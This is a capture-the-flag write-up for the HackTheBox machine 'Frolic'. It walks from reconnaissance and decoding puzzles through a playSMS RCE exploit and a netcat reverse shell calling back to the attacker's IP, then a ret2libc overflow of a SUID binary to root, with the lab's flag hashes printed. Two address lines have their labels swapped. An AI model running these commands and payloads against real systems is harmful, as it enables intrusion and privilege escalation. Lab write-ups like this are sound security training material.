This is an easy linux box
Tools used
- cat
- dirbuster
- echo
- ftp
- gdb (peda)
- grep
- ldd
- linenum
- nc
- nmap
- python
- readelf
- searchsploit
- unzip
- wget
- xxd
Reconnaissance
Nmap
nmap -sC -sV -oA frolic 10.10.10.111 -v
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA)
| 256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA)
|_ 256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
9999/tcp open http nginx 1.10.3 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1h43m04s, deviation: 3h10m31s, median: 6m55s
| nbstat: NetBIOS name: FROLIC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| FROLIC<00> Flags: <unique><active>
| FROLIC<03> Flags: <unique><active>
| FROLIC<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: frolic
| NetBIOS computer name: FROLIC\x00
| Domain name: \x00
| FQDN: frolic
|_ System time: 2020-07-31T15:51:03+05:30
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-07-31T10:21:03
|_ start_date: N/A
Here’s what nmap teaches us :
- port 22 (SSH) - OpenSSH 7.2p2
- port 139 (NETBIOS) - smbd 3.X or 4
- .port 445 (SMB) - smbd 4.3.11
- port 9999 (HTTP) - nginx 1.10.3
Let’s first see the web port.
This is a default nginx webpage, but there is an URL which is interesting : http://forlic.htb:1880
Add forlic.htb to /etc/hosts.
10.10.10.111 forlic.htb
Now I can go to the URL :
Tried default login :
- admin:admin
- admin:password
- admin:root
- root:admin
It doesn’t works, let go back here later, if I found credentials. Let’s do some files/directories brute force, for this box I used dirbuster :
There is three interesting files :
- http://10.10.10.111:9999/backup/user.txt - user - admin
- http://10.10.10.111:9999/backup/password.txt - password - imnothuman
- http://10.10.10.111:9999/dev/backup/index.php - /playsms
Tried default passwords, but it didn’t work. Let’s search a bit more and come back here if I get credentials.
One interesting directory :
- http://10.10.10.111:9999/admin/
Looking at the source code, I see a page named login.js
I know have credentials :
username == "admin"
password == "superduperlooperpassword_lol"
Once login, I’m redirected on a page with weird characters :
..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... ..... ..... ..... ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?.. ..... ..... ....! ..... ..... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !...! ..... ..... .!.!! !!!!! !!!!! !!!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !!!!! .?... ..... ..... ....! ?!!.? ..... ..... ..... .?.?! .?... ..... ..... ...!. !!!!! !!.?. ..... .!?!! .?... ...?. ?!.?. ..... ..!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!!!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.?. ..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... !.... ..... ..!.! !!!!! !.!!! !!... ..... ..... ....! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!!! !!!!! !!!!! .?... ....! ?!!.? ..... .?.?! .?... ..... ....! .?... ..... ..... ..!?! !.?.. ..... ..... ..?.? !.?.. !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !!!!! !!... ..... ...!. ?.... ..... !?!!. ?!!!! !!!!? .?!.? !!!!! !!!!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!.! !!!!! !!!!! !!!!! !.... ..... ..... ..... !.!.? ..... ..... .!?!! .?!!! !!!!! !!?.? !.?!! !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?.... ..... ..... ..!.. ..... ..... .!.?. ..... ...!? !!.?! !!!!! !!?.? !.?!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!.?. ..... ...!? !!.?. ..... ..?.? !.?.. !.!!! !!!!! !!!!! !!!!! !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! !!.!! !!!!! ..... ..!.! !!!!! !.?.
Searching on Google, I found out that this is Ook!, an esoteric programming language, now I need an interpreter. I used this one : https://www.dcode.fr/ook-language, the result is as follow :
Nothing here check /asdiSIAJJ0QWE9JAS
Going to http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/, here’s what I found :
UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwABBAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbsK1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmveEMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTjlurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkCAAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUGAAAAAAEAAQBPAAAAAwEAAAAA
This is base64 encoded, let’s decode it :
echo UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwABBAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbsK1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmveEMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTjlurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkCAAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUGAAAAAAEAAQBPAAAAAwEAAAAA | base64 -d > test
I used the command “file” to know what kind of file this is :
file test
test: Zip archive data, at least v2.0 to extract
This is a zip file, let’s unzip it ! Problem is that this is a password protected zip. So I tried default passwords :
- admin
- root
- frolic
- password
After many try, I found that the password was : “password” !
unzip test
Archive: test
[test] index.php password:
inflating: index.php
Let’s read the new file :
cat index.php
4b7973724b7973674b7973724b7973675779302b4b7973674b7973724b7973674b79737250463067506973724b7973674b7934744c5330674c5330754b7973674b7973724b7973674c6a77720d0a4b7973675779302b4b7973674b7a78645069734b4b797375504373674b7974624c5434674c53307450463067506930744c5330674c5330754c5330674c5330744c5330674c6a77724b7973670d0a4b317374506973674b79737250463067506973724b793467504373724b3173674c5434744c53304b5046302b4c5330674c6a77724b7973675779302b4b7973674b7a7864506973674c6930740d0a4c533467504373724b3173674c5434744c5330675046302b4c5330674c5330744c533467504373724b7973675779302b4b7973674b7973385854344b4b7973754c6a776743673d3d0d0a
This is hexadecimal, decode it :
cat index.php | xxd -r -p
KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr
KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg
K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t
LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==
Again base64 :
echo KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwrKysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysgK1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0tLS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg== | base64 -d
+++++ +++++ [->++ +++++ +++<] >++++ +.--- --.++ +++++ .<+++ [->++ +<]>+
++.<+ ++[-> ---<] >---- --.-- ----- .<+++ +[->+ +++<] >+++. <+++[ ->---
<]>-- .<+++ [->++ +<]>+ .---. <+++[ ->--- <]>-- ----. <++++ [->++ ++<]>
++..<
Now this is brainfuck, another esoteric programming language, the interpreter that I used is : https://www.dcode.fr/langage-brainfuck, the result is :
idkwhatispass
Now that I have credentials, I tried them on :
- red node - didn’t works
- playsms - works
Nice I’m connected ! Let’s search if there is some known exploit :
There is some RCE, nice I search on Google to found the exploit code and stumble upon this repository : https://github.com/jasperla/CVE-2017-9101
Exploit
Download the exploit :
wget https://raw.githubusercontent.com/jasperla/CVE-2017-9101/master/playsmshell.py
Try it, to see if this works :
python3 playsmshell.py --username admin --password idkwhatispass --url http://10.10.10.111:9999/playsms/ --command 'whoami'
[*] Grabbing CSRF token for login
[*] Attempting to login as admin
[+] Logged in!
[*] Grabbing CSRF token for phonebook import
[*] Attempting to execute payload
www-data
It works, nice ! Let’s get a reverse shell. Start a nc listener :
nc -lvp 1234
Launch the exploit :
python3 playsmshell.py --username admin --password idkwhatispass --url http://10.10.10.111:9999/playsms/ --command 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 1234 >/tmp/f'
[*] Grabbing CSRF token for login
[*] Attempting to login as admin
[+] Logged in!
[*] Grabbing CSRF token for phonebook import
[*] Attempting to execute payload
Go back to the listener :
nc -lvp 1234
listening on [any] 1234 ...
connect to [10.10.14.10] from forlic.htb [10.10.10.111] 46184
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
Get a TTY shell :
python -c "import pty;pty.spawn('/bin/bash')"
CTRL+Z
stty raw -echo
fg
Let’s get more information, for that I used LinEnum.sh, start a python server to transfert file :
python -m SimplHTTPServer
Copy over the script :
wget http://10.10.14.4:8000/LinEnum.sh
Launch it :
bash LinEnum.sh | tee results.txt
Read throught the results and the interesting par is :
[-] SUID files:
-rwsr-xr-x 1 root root 7480 Sep 25 2018 /home/ayush/.binary/rop
www-data@frolic:/home/ayush/.binary$ ls
rop
www-data@frolic:/home/ayush/.binary$ ./rop
[*] Usage: program <message>
www-data@frolic:/home/ayush/.binary$ ./rop test
[+] Message sent: test
www-data@frolic:/home/ayush/.binary$ ./rop AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)
So this is a binary, who take a message as input, the name suggest a common type of exploit ROP. Let’s copy this binary to my machine, for that I used a FTP server :
sudo python3 -m pyftpdlib -p 21 -w
Connect to it with “anonymous” credentials and transfert it to my computer :
www-data@frolic:/home/ayush/.binary$ ftp 10.10.14.4
Connected to 10.10.14.4.
220 pyftpdlib 1.5.4 ready.
Name (10.10.14.4:www-data): anonymous
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put rop
local: rop remote: rop
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
7480 bytes sent in 0.00 secs (11.5616 MB/s)
I used gdb-peda, to find the exacte offset of the crash. I used the command “pattern_create” to create a pattern to find the offset :
As we can see, EIP as been overwritten by 0x41474141. Now I used the command “pattern_search”, which gives me the exact offset when EIP is overwritten.
So 52 is the offset, anything after that will overwritten EIP. Let’s see if I can freely modify EIP :
I can freely modify EIP, here we can see that I overwrite EIP with 0x42424242 (BBBB). Now let’s found the protection to that binary and what exploit technique I can use.
I read this two great articles :
As the following command shows, the GNU_STACK stack does not have the X flag (only RW) so it is not executable.
www-data@frolic:/home/ayush/.binary$ readelf -l rop | grep GNU_STACK
GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x10
And the ASRL is not enable.
www-data@frolic:/home/ayush/.binary$ cat /proc/sys/kernel/randomize_va_space
0
There is no ASLR and the stack is not executable, so we can use a RET2LIBC as exploit. I follow this post : https://thinkloveshare.com/fr/hacking/pwn_2of4_ret2libc/, for my exploit. Here is what I need for the exploit to work :
[ 52 x "A" ] [ system address ] [ exit address ] [ /bin/sh address ]
To get those addresses I follow the post :
www-data@frolic:/home/ayush/.binary$ ldd rop
linux-gate.so.1 => (0xb7fda000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000)
/lib/ld-linux.so.2 (0xb7fdb000)
Offset of libc - 0xb7e19000
www-data@frolic:/home/ayush/.binary$ readelf -a /lib/i386-linux-gnu/libc.so.6 | grep system
245: 00112f20 68 FUNC GLOBAL DEFAULT 13 svcerr_systemerr@@GLIBC_2.0
627: 0003ada0 55 FUNC GLOBAL DEFAULT 13 __libc_system@@GLIBC_PRIVATE
1457: 0003ada0 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0
Offset of system - 0x0003ada0
www-data@frolic:/home/ayush/.binary$ grep -boa "/bin/sh" /lib/i386-linux-gnu/libc.so.6
1423883:/bin/sh
Offset of /bin/sh in decimal - 1423883
www-data@frolic:/home/ayush/.binary$ python -c "print hex(1423883 + 0xb7e19000)"
0xb7f74a0b
Address of system - 0xb7f74a0b
www-data@frolic:/home/ayush/.binary$ python -c "print hex(0x0003ada0 + 0xb7e19000)"
0xb7e53da0
Address of /bin/sh - 0xb7e53da0
So in my case I have :
[ 52 x "A" ] [ 0xb7e53da0 ] [ "BBBB" ] [ 0xb7f74a0b ]
I use “BBBB” as return address because I don’t care about it. In python here’s how you “translate” it :
$(python -c "print 'A'*52 + '\xa0\x3d\xe5\xb7' + 'BBBB' + '\x0b\x4a\xf7\xb7'")
Now I just have to execute it with the python code as argument !
www-data@frolic:/home/ayush/.binary$ ./rop $(python -c "print 'A'*52 + '\xa0\x3d\xe5\xb7' + 'BBBB' + '\x0b\x4a\xf7\xb7'")
# whoami
root
And voila a RET2LIBC done ! I’m root and can now read the flags !
Flags
User.txt
www-data@frolic:/home/ayush$ cat user.txt
2ab95909cf509f85a6f476b59a0c2fe0
Root.txt
# cat /root/root.txt
85d3fdf03f969892538ba9a731826222